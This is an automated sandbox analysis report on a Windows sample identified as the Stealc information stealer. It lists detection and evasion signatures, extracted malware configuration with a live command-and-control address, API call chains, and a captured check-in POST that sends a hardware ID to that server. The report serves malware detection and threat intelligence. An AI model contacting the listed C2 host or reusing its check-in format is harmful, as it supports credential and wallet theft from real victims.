Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561500
MD5:4cc6d797a10ba2b6f877fc893f459f67
SHA1:a0c6551d531895b1d716a6f2e89da0cd0721f35a
SHA256:2e9caa8ec6faf2bfcc89a031cc111e60654107d5979a197d1727266dffbc2b1a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4CC6D797A10BA2B6F877FC893F459F67)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1771648767.0000000004E50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7488JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7488JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T15:37:13.432950+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.7488.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D64C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D64C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D660D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D660D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D840B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00D840B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D76960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00D76960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_00D6EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D69B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00D69B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D76B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00D76B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D69B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00D69B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D67750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00D67750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D718A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D718A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D73910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D73910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D71250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D71269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D71269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D7E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D7CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D72390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00D72390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D6DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D6DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D723A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D723A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D74B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D74B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D74B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D74B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00D7D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00D7DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D616B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00D616B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D616A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00D616A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 46 44 37 30 30 46 45 38 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 2d 2d 0d 0a Data Ascii: ------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="hwid"55FD700FE8543207603164------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="build"mars------BFCGDAAKFHIDBFIDBKFH--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D64C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00D64C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCGDAAKFHIDBFIDBKFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 46 44 37 30 30 46 45 38 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 44 42 4b 46 48 2d 2d 0d 0a Data Ascii: ------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="hwid"55FD700FE8543207603164------BFCGDAAKFHIDBFIDBKFHContent-Disposition: form-data; name="build"mars------BFCGDAAKFHIDBFIDBKFH--
              Source: file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1831342123.0000000000C40000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1831342123.0000000000C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/K
              Source: file.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1831342123.0000000000C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1831342123.0000000000C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: file.exe, 00000000.00000002.1831342123.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206b
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D69770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00D69770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D848B00_2_00D848B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111C1BE0_2_0111C1BE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE0150_2_011EE015
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E82F0_2_0107E82F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108E09F0_2_0108E09F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011213220_2_01121322
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011263A80_2_011263A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111DBE60_2_0111DBE6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106627D0_2_0106627D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112B2830_2_0112B283
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01037AD00_2_01037AD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01129D130_2_01129D13
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C15840_2_010C1584
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124747B0_2_0124747B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111F72A0_2_0111F72A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112CE280_2_0112CE28
